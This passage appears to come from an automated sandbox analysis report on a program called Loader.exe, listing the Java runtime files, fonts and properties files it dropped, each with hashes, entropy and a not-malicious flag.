                                                                                                                                                                                                                                                                                                              SSDEEP:12288:qLvFVMHxMyEg7+dYmx0nqEdgq2C942bjAHcOveMdDLtHHicwqJM5SznKMWKdk/H2:cF9rYmxQ5tOcOdFwqSYzn0DfYHs4jOBK
                                                                                                                                                                                                                                                                                                              MD5:24857AD811CEDA70BD0F087FD28B5B6E
                                                                                                                                                                                                                                                                                                              SHA1:707305EB10B1464D40BDEABADE77B80B984A621A
                                                                                                                                                                                                                                                                                                              SHA-256:321D646AD29A5B180CA98BB49E81C2C732523B7E5145A3C568766CEC06B2B1CD
                                                                                                                                                                                                                                                                                                              SHA-512:A10A340BDB2DE2D0D14ED804F04313D1D4CBD64EF0513A9E54B7FA95FFB05F2123C9095A4B2BFFA4DDF3ADEA9A67E978D26D115A8F5677AE1BD0EE67C416FA5A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1511
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.142622776492157
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:EV677x6CFRf08P86xX+4jz98ht4QLlJVzDOFw5DOFFVzDOFvVzDOFz5qlV/FRARV:EE796OfT0OZjzGs6lDitfitigXFqX6Kp
                                                                                                                                                                                                                                                                                                              MD5:77ABE2551C7A5931B70F78962AC5A3C7
                                                                                                                                                                                                                                                                                                              SHA1:A8BB53A505D7002DEF70C7A8788B9A2EA8A1D7BC
                                                                                                                                                                                                                                                                                                              SHA-256:C557F0C9053301703798E01DC0F65E290B0AE69075FB49FCC0E68C14B21D87F4
                                                                                                                                                                                                                                                                                                              SHA-512:9FE671380335804D4416E26C1E00CDED200687DB484F770EBBDB8631A9C769F0A449C661CB38F49C41463E822BEB5248E69FD63562C3D8C508154C5D64421935
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..! access-bridge-32.jar..com/sun/java/accessibility/..! access-bridge.jar..com/sun/java/accessibility/..! cldrdata.jar..sun/text..sun/util..# dnsns.jar..META-INF/services/sun.net.spi.nameservice.NameServiceDescriptor..sun/net..! jaccess.jar..com/sun/java/accessibility/..# localedata.jar..sun/text..sun/util..# nashorn.jar..jdk/nashorn..META-INF/services/javax.script.ScriptEngineFactory..jdk/internal..# sunec.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunjce_provider.jar..com/sun/crypto/..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunmscapi.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# sunpkcs11.jar..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# zipfs.jar..META-INF/services/java.nio.file.spi.FileSystemProvider..com/sun/nio/..# jfxrt.jar..META-INF/INDEX.LIST..com/sun
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2018860
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.9328569913001905
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:fBkB7GOrPDSz0fHaIU1KDWtHkLs0amlyYu:fBkoOruSHa/4y/FmA
                                                                                                                                                                                                                                                                                                              MD5:F3E3E7769994C69DFF6E35EF938443CA
                                                                                                                                                                                                                                                                                                              SHA1:758F42C0A03121AD980DC98BE82DCAF790679E79
                                                                                                                                                                                                                                                                                                              SHA-256:CF0268FF39D19876BD42BF59E2CE93BB9AA57E5EE98C212BAE0184BD87F2D35A
                                                                                                                                                                                                                                                                                                              SHA-512:AB4801E8538B9B84124D2B8C36E64232F16DA686C5FA565C5DE2091C910806A850464F5CCC79C9320DF6F8CB943633FC38FEA63F9E0593A44E3541F15F126951
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):39771
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.92713480980539
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:ah0EOq/w9b3jpSo40ROLB2CUrQbNVkJBtw6pcZWztpQeA4Uz7NWnZVNB3gX083/z:aJOyw9b3joo4hLB2CUr2yBw6pcMtpS44
                                                                                                                                                                                                                                                                                                              MD5:A269905BBB9F7D02BAA24A756E7B09D7
                                                                                                                                                                                                                                                                                                              SHA1:82A0F9C5CBC2B79BDB6CFE80487691E232B26F9C
                                                                                                                                                                                                                                                                                                              SHA-256:E2787698D746DC25C24D3BE0FA751CEA6267F68B4E972CFC3DF4B4EAC8046245
                                                                                                                                                                                                                                                                                                              SHA-512:496841CF49E2BF4EB146632F7D1F09EFA8F38AE99B93081AF4297A7D8412B444B9F066358F0C110D33FEA6AE60458355271D8FDCD9854C02EFB2023AF5F661F6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):279427
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.90277234368113
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:E/Ieog0SgEOU8pqHbQpr16jWun5bT1aReAaTFMzpx2Xcpll+PrA3YaRBlLi:E/m9eJsppCLJTURe9TFMrQ0fkUK
                                                                                                                                                                                                                                                                                                              MD5:B04074A9FC78DC1409168E1E2D139647
                                                                                                                                                                                                                                                                                                              SHA1:54182C904A48364FC572E3A2631DF14823C29CEF
                                                                                                                                                                                                                                                                                                              SHA-256:BFAD3FB11E7115AAF34719488551BF3205B2FAFFB38681C7F6BDAD19BB7568C2
                                                                                                                                                                                                                                                                                                              SHA-512:E97CA3D53E867E957BF467688F83C53B2FD6FF1EA001B19F03A23096581DC8ADCEC7C1403D164D063B1A437E4BF6FA98E1543626849D4E17E31156CB012F9599
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):32699
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.878192531974338
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:iLy1giOqjU0jNVmOTuDQJD/RpAczsikFfg0y+7aBTS73dyPoXvvKv2PtvHubyKhi:i4giOaU0jNVmOCADZpVsiUf3yua5S7t7
                                                                                                                                                                                                                                                                                                              MD5:2249EAC4F859C7BC578AFD2F7B771249
                                                                                                                                                                                                                                                                                                              SHA1:76BA0E08C6B3DF9FB1551F00189323DAC8FC818C
                                                                                                                                                                                                                                                                                                              SHA-256:A0719CAE8271F918C8613FEB92A7591D0A6E7D04266F62144B2EAB7844D00C75
                                                                                                                                                                                                                                                                                                              SHA-512:DB5415BC542F4910166163F9BA34BC33AF1D114A73D852B143B2C3E28F59270827006693D6DF460523E26516CAB351D2EE3F944D715AE86CD12D926D09F92454
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):250826
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951088517189604
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:dKtThM4XbBG7v3jUAbE0MEIynrI25ENN/kv1Pv:dKphM4X1G7PjlbE0MxHLbC
                                                                                                                                                                                                                                                                                                              MD5:2E33D8F1FBEB9239C6FFC0D36DE772D1
                                                                                                                                                                                                                                                                                                              SHA1:3F881E3B34693A96CD3D9E20D6AEABAE98757359
                                                                                                                                                                                                                                                                                                              SHA-256:938C497E97E893D0B9325522475AD9FB2C365A4AF832ED180B570C3E4E6FD559
                                                                                                                                                                                                                                                                                                              SHA-512:DB9A5B0F269BBFC9CB712D8BF170414D649CD72F0DEECCDC3A4D742430E2E29E203F7E462D2DF8F9EC2C82723A8A56FF8FD409CDCBE66547C798B15370B8DB65
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):68923
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.950933538093809
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:YNSe2yN5DbD630l1MIeEfqjGWb2LU2j6rnbisZp/u:Ne2yNhDVl1leEP/qn2sZk
                                                                                                                                                                                                                                                                                                              MD5:4D507E8D7BBF5ECEC8791CBA57B1CE17
                                                                                                                                                                                                                                                                                                              SHA1:A66C0D4648A06B9078252D090D596C91C591AA50
                                                                                                                                                                                                                                                                                                              SHA-256:C3993DF765AFF1068A656B28A7A4EDFFE7710AE3B6AA2EA056A6F9C3EDBDC210
                                                                                                                                                                                                                                                                                                              SHA-512:21B4E729B16947B31657DC5F7F5C75DCDA9F94B4A0ED414E11A6D02951137AC266D605855DDDA7C21BE0200EA07530962D1ECE2FAE009EAE5F2A1A365195C995
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4005
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.909684349537555
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:5Th0S7zmtRUioj/DUXBZZjM8mcWoe+YfVktH:5h0Iz6Uioj/YXLZjnmdoeDktH
                                                                                                                                                                                                                                                                                                              MD5:B0CE9F297D3FEC6325C0C784072908F1
                                                                                                                                                                                                                                                                                                              SHA1:DD778A0E5417B9B97187215FFC66D4C14F95FEF0
                                                                                                                                                                                                                                                                                                              SHA-256:6DA00C1CBE02909DCD6A75DA51D25DBF49BFD1D779C0B8E57B12E757229FC4A8
                                                                                                                                                                                                                                                                                                              SHA-512:4C774BCB9ADE996569C86DD46B3BDB046771AD1BCF9AABB9DB86854C83E18015CBE5DF73DA86EE98E26BA0393F548B1CC09DE60BDA4248EACC4FC833E23B8AB4
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# This properties file is used to initialize the default..# java.awt.datatransfer.SystemFlavorMap. It contains the Win32 platform-..# specific, default mappings between common Win32 Clipboard atoms and platform-..# independent MIME type strings, which will be converted into..# java.awt.datatransfer.DataFlavors...#..# These default mappings may be augmented by specifying the..#..# AWT.DnD.flavorMapFileURL ..#..# property in the appropriate awt.properties file. The specified properties URL..# will be loaded into the SystemFlavorMap...#..# The standard format is:..#..# <native>=<MIME type>..#..# <native> should be a string identifier that the native platform will..# recognize as a valid data format. <MIME type> should specify both a MIME..# primary type and a MIME subtype separated by a '/'. The MIME type may include..# parameters, where each parameter is a key/value pair separated by '=', and..# where each parameter to the MIME type is separated by a ';'...#..# Because SystemFla
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3670
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.40570512634857
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:IRsY7hGbXWvaBKvKY5csW4BxciETBT5Bxrws+LW/B56JF:At/vaBKvKY5fxci8jMWY
                                                                                                                                                                                                                                                                                                              MD5:E0E5428560288E685DBFFC0D2776D4A6
                                                                                                                                                                                                                                                                                                              SHA1:2AE70624762C163C8A1533F724AA5A511D8B208E
                                                                                                                                                                                                                                                                                                              SHA-256:AAE23ACC42F217A63D675F930D077939765B97E9C528B5659842515CA975111F
                                                                                                                                                                                                                                                                                                              SHA-512:C726CC2898399579AFA70ACACE86BEC4369D4541112243E51721568B4D25DCC6C66FA64AC475AFF9BA9DE07A630B24A9F221FA00426AD36845203BA809219E3C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10779
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.217016051711063
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Pj2TlKg7RzPc/mOHUFN5HX/rS8QbWZjjfVpMbtxp8lcR9NN:Pj6Y8NcFzXbWZjj9pSMlcz
                                                                                                                                                                                                                                                                                                              MD5:0C1DB7410938A3634BD9928BA2F284CB
                                                                                                                                                                                                                                                                                                              SHA1:7EE31F22136E73A2A3D0AAB279199778BAAB06F5
                                                                                                                                                                                                                                                                                                              SHA-256:818A718788E5506EBB84F26DE82B6C60E08861876400E9ED3931346174D5D7FB
                                                                                                                                                                                                                                                                                                              SHA-512:EE267E59564A077713856A307382D40D0D8DF8E7EC2EF930723B076F5E38446D3B2600D10AC192262F9A3A86D9973CF13A9E90D180818C05A6C7896A5BD7AD19
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# ..# Copyright (c) 2003, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....# Version....version=1....# Component Font Mappings....allfonts.chinese-ms936=SimSun..allfonts.chinese-ms936-extb=SimSun-ExtB..allfonts.chinese-gb18030=SimSun-18030..allfonts.chinese-gb18030-extb=SimSun-ExtB..allfonts.chinese-hkscs=MingLiU_HKSCS..allfonts.chinese-ms950-extb=MingLiU-ExtB..allfonts.devanagari=Mangal..allfonts.dingbats=Wingdings..allfonts.lucida=Lucida Sans Regular..allfonts.symbol=Symbol..allfonts.thai=Lucida Sans Regular..allfonts.georgian=Sylfaen....serif.plain.alphabetic=Times New Roman..serif.plain.chinese-ms950=MingLiU..serif.plain.chinese-ms950-extb=MingLiU-ExtB..serif.plain.hebrew=David..serif.plain.japanese=MS Mincho..serif.plain.korean=Batang....serif.bold.alphabetic=Times New Roman Bold..serif.bold.chinese-ms950=PMingLiU..serif.bold.chinese-ms9
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,422.Lucida BrightDemiboldLucida Bright Dem
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):75144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.849420541001734
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:H8Jwt1GIlZ6l0/9tRWhc0x/YxvsTjyIDXCrGU/tlDaKAgKrTLznvzDJIZmjFA0zG:Mwtze9xQcQ/LDaKAgK3LLvzFogbFt5WD
                                                                                                                                                                                                                                                                                                              MD5:AF0C5C24EF340AEA5CCAC002177E5C09
                                                                                                                                                                                                                                                                                                              SHA1:B5C97F985639E19A3B712193EE48B55DDA581FD1
                                                                                                                                                                                                                                                                                                              SHA-256:72CEE3E6DF72AD577AF49C59DCA2D0541060F95A881845950595E5614C486244
                                                                                                                                                                                                                                                                                                              SHA-512:6CE87441E223543394B7242AC0CB63505888B503EC071BBF7DB857B5C935B855719B818090305E17C1197DE882CCC90612FB1E0A0E5D2731F264C663EB8DA3F9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc.Lucida BrightDemibold ItalicLucida Bright Demibold Itali
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):75124
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.805969666701276
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:lww80sTGzcKHwxWL0T+qHi/sbA06PoNORsr5sOnD0OyuusGa7bs4J:lwL0i97WL0T+qHA9cOR05FD0Oyup74w
                                                                                                                                                                                                                                                                                                              MD5:793AE1AB32085C8DE36541BB6B30DA7C
                                                                                                                                                                                                                                                                                                              SHA1:1FD1F757FEBF3E5F5FBB7FBF7A56587A40D57DE7
                                                                                                                                                                                                                                                                                                              SHA-256:895C5262CDB6297C13725515F849ED70609DBD7C49974A382E8BBFE4A3D75F8C
                                                                                                                                                                                                                                                                                                              SHA-512:A92ADDD0163F6D81C3AEABD63FF5C293E71A323F4AEDFB404F6F1CDE7F84C2A995A30DFEC84A9CAF8FFAF8E274EDD0D7822E6AABB2B0608696A360CABFC866C6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,773.Lucida BrightItalicLucida Bright Itali
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):80856
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.821405620058844
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:jw9ESkPFybxWj1V7zbPUoOPjp85rFqXpLboVklDNTc2Wt:jwZO0xWPTU7l85rFYpLbott
                                                                                                                                                                                                                                                                                                              MD5:4D666869C97CDB9E1381A393FFE50A3A
                                                                                                                                                                                                                                                                                                              SHA1:AA5C037865C563726ECD63D61CA26443589BE425
                                                                                                                                                                                                                                                                                                              SHA-256:D68819A70B60FF68CA945EF5AD358C31829E43EC25024A99D17174C626575E06
                                                                                                                                                                                                                                                                                                              SHA-512:1D1F61E371E4A667C90C2CE315024AE6168E47FE8A5C02244DBF3DF26E8AC79F2355AC7E36D4A81D82C52149197892DAED1B4C19241575256BB4541F8B126AE2
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 16 names, Macintosh, Copyright (c) 2000 Bigelow & Holmes Inc. Pat. Des 289,421.Lucida BrightRegularLucida Bright Regu
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):344908
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.939775499317555
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:oBfQeUG2CCTufrmOufymM8hvFHp277tS9iZFYSATxNm:oNQ3vCCTcaFNJw7tSgYS82
                                                                                                                                                                                                                                                                                                              MD5:630A6FA16C414F3DE6110E46717AAD53
                                                                                                                                                                                                                                                                                                              SHA1:5D7ED564791C900A8786936930BA99385653139C
                                                                                                                                                                                                                                                                                                              SHA-256:0FAAACA3C730857D3E50FBA1BBAD4CA2330ADD217B35E22B7E67F02809FAC923
                                                                                                                                                                                                                                                                                                              SHA-512:0B7CDE0FACE982B5867AEBFB92918404ADAC7FB351A9D47DCD9FE86C441CACA4DD4EC22E36B61025092220C0A8730D292DA31E9CAFD7808C56CDBF34ECD05035
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 15 tables, 1st "LTSH", 19 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansDemiboldLucida Sa
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):317896
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.869598480468745
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:R5OO1ZjNDE7/MsTJ30otegK4zJwz3UhG5jXsrg2HLzYv7cf0R7o7+WX/ov2DG:bOO11CEo9xzJwljXsrhHQ7cMuX/16
                                                                                                                                                                                                                                                                                                              MD5:5DD099908B722236AA0C0047C56E5AF2
                                                                                                                                                                                                                                                                                                              SHA1:92B79FEFC35E96190250C602A8FED85276B32A95
                                                                                                                                                                                                                                                                                                              SHA-256:53773357D739F89BC10087AB2A829BA057649784A9ACBFFEE18A488B2DCCB9EE
                                                                                                                                                                                                                                                                                                              SHA-512:440534EB2076004BEA66CF9AC2CE2B37C10FBF5CC5E0DD8B8A8EDEA25E3613CE8A59FFCB2500F60528BBF871FF37F1D0A3C60396BC740CCDB4324177C38BE97A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 18 tables, 1st "GDEF", 19 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc. Pat. Des. 289,420.Lucida SansRegularLucida Sans Regu
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):698236
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.892888039120645
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:6obn11t7t7DxT+3+OQ64cctiOAq12ZX/DmfT6R83Sd8uvx7wSnyER4ky+SH/KPKQ:6oTJZzHniOAZ783Sd8uvx7wSnyER4kyI
                                                                                                                                                                                                                                                                                                              MD5:B75309B925371B38997DF1B25C1EA508
                                                                                                                                                                                                                                                                                                              SHA1:39CC8BCB8D4A71D4657FC92EF0B9F4E3E9E67ADD
                                                                                                                                                                                                                                                                                                              SHA-256:F8D877B0B64600E736DFE436753E8E11ACB022E59B5D7723D7D221D81DC2FCDE
                                                                                                                                                                                                                                                                                                              SHA-512:9C792EF3116833C90103F27CFD26A175AB1EB11286959F77062893A2E15DE44D79B27E5C47694CBBA734CC05A9A5BEFA72E991C7D60EAB1495AAC14C5CAD901D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999, 2001 by Bigelow & Holmes Inc.Lucida Sans TypewriterBoldLucida Sans Typewrite
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):234068
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.901545053424004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:3BPS7w5KIMtYwqcO3GbA4MJcs2ME9UGQ2n9gM/oD:xVMtgcGGPMJcs4b9gM/4
                                                                                                                                                                                                                                                                                                              MD5:A0C96AA334F1AEAA799773DB3E6CBA9C
                                                                                                                                                                                                                                                                                                              SHA1:A5DA2EB49448F461470387C939F0E69119310E0B
                                                                                                                                                                                                                                                                                                              SHA-256:FC908259013B90F1CBC597A510C6DD7855BF9E7830ABE3FC3612AB4092EDCDE2
                                                                                                                                                                                                                                                                                                              SHA-512:A43CF773A42B4CEBF4170A6C94060EA2602D2D7FA7F6500F69758A20DC5CC3ED1793C7CEB9B44CE8640721CA919D2EF7F9568C5AF58BA6E3CF88EAE19A95E796
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:TrueType Font data, 13 tables, 1st "OS/2", 16 names, Macintosh, Copyright (c) 1999 by Bigelow & Holmes Inc.Lucida Sans TypewriterRegularLucida Sans Typewriter R
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):242700
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.936925430880877
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:VwzZsJcCrn271g+UGFDUnrrHqMyBtlc3+fzx5R1zeqZdDgfSkecUfEDpEXzSyPMx:GWcCrn2C46Ak+naqaucYEDpEX3gZoO9
                                                                                                                                                                                                                                                                                                              MD5:C1397E8D6E6ABCD727C71FCA2132E218
                                                                                                                                                                                                                                                                                                              SHA1:C144DCAFE4FAF2E79CFD74D8134A631F30234DB1
                                                                                                                                                                                                                                                                                                              SHA-256:D9D0AAB0354C3856DF81AFAC49BDC586E930A77428CB499007DDE99ED31152FF
                                                                                                                                                                                                                                                                                                              SHA-512:DA70826793C7023E61F272D37E2CC2983449F26926746605C550E9D614ACBF618F73D03D0C6351B9537703B05007CD822E42E6DC74423CB5CC736B31458D33B1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14331
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.512673497574481
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:W6Zh/3dzz8XIrN2r1CdaqRWtHwBWgvw0Jy/ArUsJzu0HI:W6jhGIwxCdaqWQBWgvw0JyorBJzu0o
                                                                                                                                                                                                                                                                                                              MD5:6E378235FB49F30C9580686BA8A787AA
                                                                                                                                                                                                                                                                                                              SHA1:2FC76D9D615A35244133FC01AB7381BA49B0B149
                                                                                                                                                                                                                                                                                                              SHA-256:B4A0C0A98624C48A801D8EA071EC4A3D582826AC9637478814591BC6EA259D4A
                                                                                                                                                                                                                                                                                                              SHA-512:58558A1F8D9D3D6F0E21B1269313FD6AC9A80A93CC093A5E8CDEC495855FCD2FC95A6B54FE59E714E89D9274654BB9C1CD887B3FB9D4B9D9C50E5C5983C571B8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# This properties file defines a Hijrah calendar variant...#..# Fields:..#..# <version> ::= 'version' '=' <version string>..# <id> ::= 'id' '=' <id string>..# <type> ::= 'type' '=' <type string>..# <iso-start> ::= 'iso-start' '=' <start date in the ISO calendar>..# <year> ::= <yyyy> '=' <nn nn nn nn nn nn nn nn nn nn nn nn>..#..# version ... (Required)..#..# id ... (Required)..# Identifies the Java Chronology..#..# type ... (Required)..# Identifies the type of calendar in the standard calendar ID scheme..# iso-start ... (Required)..# Specifies the corresponding ISO date to the first Hijrah day..# in the defined range of dates..#..# year ... (Required)..# Number of days for each month of a Hijrah year..# * Each line defines a ye
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):657
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.993355967240905
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:QcwmIzDpneoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoeoe9B7aEiwoXH3Eoe4Q:QhDpemaoXHIB5foMS1JUqf07f
                                                                                                                                                                                                                                                                                                              MD5:9FD47C1A487B79A12E90E7506469477B
